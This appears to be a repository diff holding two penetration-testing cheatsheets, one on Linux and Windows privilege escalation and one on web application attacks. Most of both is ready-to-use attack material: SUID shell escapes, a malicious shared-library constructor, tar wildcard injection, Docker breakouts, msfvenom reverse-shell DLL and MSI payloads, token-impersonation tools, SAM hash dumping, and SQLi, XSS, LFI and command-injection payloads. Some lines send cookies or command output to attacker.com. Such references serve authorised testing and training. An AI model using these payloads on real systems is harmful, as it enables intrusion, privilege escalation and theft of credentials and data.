sudo -u#-1 /bin/bash
# Baron Samedit CVE-2021-3156 (sudo 1.8.2-1.8.31p2, 1.9.0-1.9.5p1)
# Use exploit from GitHub
```
---
## SUID Binaries
### Find SUID Binaries
```bash
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
```
### Exploitation
```bash
# Check GTFOBins for SUID exploitation
# base64
./base64 /etc/shadow | base64 -d
# cp
./cp /etc/passwd /tmp/passwd
# modify and copy back
# find
./find . -exec /bin/sh -p \; -quit
# vim
./vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
```
### Shared Object Injection
```bash
# Find SUID binary dependencies
strace /path/to/suid-binary 2>&1 | grep -i -E "open|access|no such file"
# If it loads a missing .so file from writable path:
# Create malicious .so
# libcalc.c
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
gcc -shared -fPIC libcalc.c -o /path/to/libcalc.so
```
---
## Capabilities
```bash
# Find binaries with capabilities
getcap -r / 2>/dev/null
# Common exploitable capabilities
# cap_setuid+ep - can change UID
# Python with cap_setuid
python -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Perl with cap_setuid
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
```
---
## Cron Jobs
```bash
# System cron
cat /etc/crontab
ls -la /etc/cron.*
# User cron
crontab -l
# Look for:
# - Writable scripts
# - Writable paths in scripts
# - Wildcard injection opportunities
# Wildcard injection (tar)
# If cron runs: tar czf /tmp/backup.tar.gz *
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"
```
---
## NFS Root Squashing
```bash
# Check NFS exports
cat /etc/exports
showmount -e <target>
# If no_root_squash is set:
# Mount on attacker machine
mkdir /tmp/nfs
mount -o rw <target>:/share /tmp/nfs
# Create SUID binary
cp /bin/bash /tmp/nfs/bash
chmod +s /tmp/nfs/bash
# On target
/share/bash -p
```
---
## Docker Escape
```bash
# Check if in docker
cat /proc/1/cgroup | grep docker
ls -la /.dockerenv
# If user is in docker group
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# If docker.sock is accessible
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt sh
```
---
## PATH Hijacking
```bash
# If SUID binary calls commands without full path:
# 1. Create malicious binary
echo '/bin/bash -p' > /tmp/service
chmod +x /tmp/service
# 2. Prepend PATH
export PATH=/tmp:$PATH
# 3. Run SUID binary
```
---
# Windows Privilege Escalation
## Initial Enumeration
### System Information
```cmd
systeminfo
hostname
whoami
whoami /priv
whoami /groups
net user
net user <username>
net localgroup
net localgroup administrators
```
### Network Enumeration
```cmd
ipconfig /all
route print
arp -a
netstat -ano
```
### Process/Service Enumeration
```cmd
tasklist /SVC
sc query
wmic service list brief
```
### Find Passwords
```cmd
findstr /si password *.txt *.ini *.config
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```
---
## Automated Tools
```powershell
# WinPEAS
.\winPEAS.exe
# PowerUp
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks
# windows-exploit-suggester
python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo systeminfo.txt
# Seatbelt
.\Seatbelt.exe -group=all
```
---
## Service Exploits
### Unquoted Service Paths
```cmd
# Find unquoted paths
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\"
# If path is: C:\Program Files\Some Service\service.exe
# Drop malicious exe at: C:\Program.exe or C:\Program Files\Some.exe
```
### Weak Service Permissions
```cmd
# Check service permissions
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv <username> *
# If SERVICE_CHANGE_CONFIG:
sc config <service> binpath= "C:\temp\shell.exe"
sc stop <service>
sc start <service>
```
### DLL Hijacking
```powershell
# Find DLL search order issues
# Use Process Monitor to find missing DLLs
# Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > evil.dll
```
---
## Token Impersonation
### Check Privileges
```cmd
whoami /priv
```
### SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege
```cmd
# Potato attacks
.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\shell.exe" -t *
# PrintSpoofer (Windows 10/Server 2019)
.\PrintSpoofer.exe -i -c cmd
# GodPotato
.\GodPotato.exe -cmd "cmd /c whoami"
```
---
## Registry Exploits
### AlwaysInstallElevated
```cmd
# Check if enabled
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If both return 1:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi > shell.msi
msiexec /quiet /qn /i shell.msi
```
### AutoRun
```cmd
# Check autorun locations
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Check if writable
accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program"
```
---
## Saved Credentials
```cmd
# List saved credentials
cmdkey /list
# RunAs with saved creds
runas /savecred /user:admin C:\temp\shell.exe
```
---
## SAM/SYSTEM Dump
```cmd
# If you can access:
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
# Or backup locations:
C:\Windows\Repair\SAM
C:\Windows\Repair\SYSTEM
# Extract hashes
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
```
---
## Kernel Exploits
```cmd
# Check Windows version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# Common exploits
# MS16-032 (Secondary Logon Handle)
# MS17-010 (EternalBlue)
```
---
## Resources
### Linux
- [GTFOBins](https://gtfobins.github.io/)
- [LinPEAS](https://github.com/carlospolop/PEASS-ng)
- [PayloadsAllTheThings - Linux PrivEsc](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)
- [HackTricks - Linux PrivEsc](https://book.hacktricks.xyz/linux-hardening/privilege-escalation)
### Windows
- [LOLBAS](https://lolbas-project.github.io/)
- [WinPEAS](https://github.com/carlospolop/PEASS-ng)
- [PayloadsAllTheThings - Windows PrivEsc](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
- [HackTricks - Windows PrivEsc](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation)

337
infosec/web-application-security.md Normal file
View file

@ -0,0 +1,337 @@
# Web Application Security Cheatsheet
Quick reference for web application penetration testing, OWASP vulnerabilities, and common attack techniques.
## OWASP Top 10 (2021)
| # | Category | Description |
|---|----------|-------------|
| A01 | Broken Access Control | IDOR, privilege escalation, directory traversal |
| A02 | Cryptographic Failures | Weak encryption, sensitive data exposure |
| A03 | Injection | SQLi, XSS, command injection, LDAP injection |
| A04 | Insecure Design | Missing security controls, flawed architecture |
| A05 | Security Misconfiguration | Default creds, verbose errors, XXE |
| A06 | Vulnerable Components | Outdated libraries, unpatched dependencies |
| A07 | Authentication Failures | Weak passwords, session fixation, brute force |
| A08 | Software/Data Integrity | Insecure deserialization, unsigned updates |
| A09 | Logging Failures | Missing audit trails, no alerting |
| A10 | SSRF | Server-side request forgery |
---
## SQL Injection
### Detection
```
# Test characters
'
"
#
--
;
```
### Login Bypass
```sql
' OR 1=1--
' OR 1=1#
admin'--
admin'#
' OR '1'='1
" OR "1"="1
1' or '1' = '1
1" or "1" = "1
```
### Union-Based
```sql
' UNION SELECT 1,2,3--
' UNION SELECT null,null,null--
' UNION SELECT username,password FROM users--
```
### Blind SQLi (Time-Based)
```sql
' AND SLEEP(5)--
' WAITFOR DELAY '0:0:5'--
'; IF (1=1) WAITFOR DELAY '0:0:5'--
```
### SQLMap
```bash
# Basic scan
sqlmap -u "http://target.com/page?id=1" --batch
# With POST data
sqlmap -u "http://target.com/login" --data "user=admin&pass=test" --batch
# Enumerate databases
sqlmap -u "http://target.com/page?id=1" --dbs
# Dump specific table
sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump
# Common options
--random-agent # Random user agent
--level=5 # Increase test level
--risk=3 # Increase risk level
--threads=10 # Parallel requests
--os-shell # OS shell if possible
```
---
## Cross-Site Scripting (XSS)
### Types
- **Reflected**: Input immediately returned in response
- **Stored**: Payload saved and executed for other users
- **DOM-based**: Client-side JavaScript processes malicious input
### Basic Payloads
```html
<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<body onload=alert('XSS')>
```
### WAF Bypass Techniques
```html
<!-- Case variation -->
<ScRiPt>alert('XSS')</sCrIpT>
<!-- Event handlers -->
<img src=x onerror=alert('XSS')>
<svg/onload=alert('XSS')>
<body onpageshow=alert('XSS')>
<!-- Encoding -->
<script>alert(String.fromCharCode(88,83,83))</script>
<!-- Without parentheses -->
<script>alert`XSS`</script>
<img src=x onerror=alert`XSS`>
```
### Cookie Stealing
```html
<script>
new Image().src="http://attacker.com/steal?c="+document.cookie;
</script>
```
---
## Server-Side Request Forgery (SSRF)
### Common Targets
```
# Localhost
http://127.0.0.1
http://localhost
http://0.0.0.0
# Cloud metadata
http://169.254.169.254/latest/meta-data/ # AWS
http://metadata.google.internal/ # GCP
http://169.254.169.254/metadata/instance # Azure
# Internal services
http://192.168.0.1
http://10.0.0.1
http://172.16.0.1
```
### Bypass Techniques
```
# Decimal IP
http://2130706433 # 127.0.0.1
# Hex IP
http://0x7f000001 # 127.0.0.1
# URL encoding
http://127.0.0.1%00@attacker.com
# DNS rebinding
Use your own DNS server that resolves to internal IP
```
---
## Directory Traversal / LFI
### Basic Payloads
```
../../../etc/passwd
....//....//....//etc/passwd
..%2f..%2f..%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
```
### Common Targets (Linux)
```
/etc/passwd
/etc/shadow
/etc/hosts
/proc/self/environ
/var/log/apache2/access.log
~/.ssh/id_rsa
~/.bash_history
```
### Common Targets (Windows)
```
C:\Windows\System32\config\SAM
C:\Windows\repair\SAM
C:\Windows\System32\drivers\etc\hosts
C:\inetpub\logs\LogFiles\
```
### LFI to RCE
```
# Log poisoning
# 1. Inject PHP into User-Agent
# 2. Include log file
/var/log/apache2/access.log
# PHP wrappers
php://filter/convert.base64-encode/resource=index.php
php://input # POST data as code
data://text/plain,<?php system($_GET['cmd']); ?>
```
---
## Command Injection
### Detection Characters
```
;
|
||
&
&&
`command`
$(command)
```
### Payloads
```bash
; whoami
| whoami
|| whoami
& whoami
&& whoami
`whoami`
$(whoami)
# Blind (time-based)
; sleep 5
| sleep 5
& ping -c 5 127.0.0.1
# Out-of-band
; curl http://attacker.com/$(whoami)
; nslookup $(whoami).attacker.com
```
---
## Insecure Direct Object Reference (IDOR)
### Testing Approach
```
# Change numeric IDs
/api/user/123 → /api/user/124
# Change GUIDs (try sequential or predictable)
/api/doc/abc-123 → /api/doc/abc-124
# Parameter manipulation
?user_id=1 → ?user_id=2
?file=report_1.pdf → ?file=report_2.pdf
# HTTP method tampering
GET /api/admin → POST /api/admin
```
---
## Authentication Bypass
### Default Credentials
```
admin:admin
admin:password
root:root
test:test
guest:guest
```
### Brute Force Protection Bypass
```
# Header manipulation
X-Forwarded-For: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
# Username enumeration
# Look for timing differences
# Look for response differences
```
### JWT Attacks
```bash
# None algorithm
# Change "alg": "HS256" to "alg": "none"
# Weak secret
hashcat -a 0 -m 16500 jwt.txt wordlist.txt
# Key confusion (RS256 to HS256)
# Sign with public key as HMAC secret
```
---
## Burp Suite Quick Reference
### Keyboard Shortcuts
| Action | Shortcut |
|--------|----------|
| Send to Repeater | Ctrl+R |
| Send to Intruder | Ctrl+I |
| Forward request | Ctrl+F |
| Drop request | Ctrl+D |
### Intruder Attack Types
- **Sniper**: Single payload position, one at a time
- **Battering ram**: Same payload all positions
- **Pitchfork**: Different payload lists, parallel
- **Cluster bomb**: All combinations
---
## Useful Tools
| Tool | Purpose |
|------|---------|
| Burp Suite | Proxy, scanner, manual testing |
| SQLMap | Automated SQL injection |
| ffuf | Web fuzzing |
| Gobuster | Directory brute forcing |
| Nikto | Web server scanner |
| WPScan | WordPress scanner |
| Nuclei | Template-based scanning |
---
## Resources
- [PortSwigger Web Security Academy](https://portswigger.net/web-security)
- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
- [HackTricks Web](https://book.hacktricks.xyz/)
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)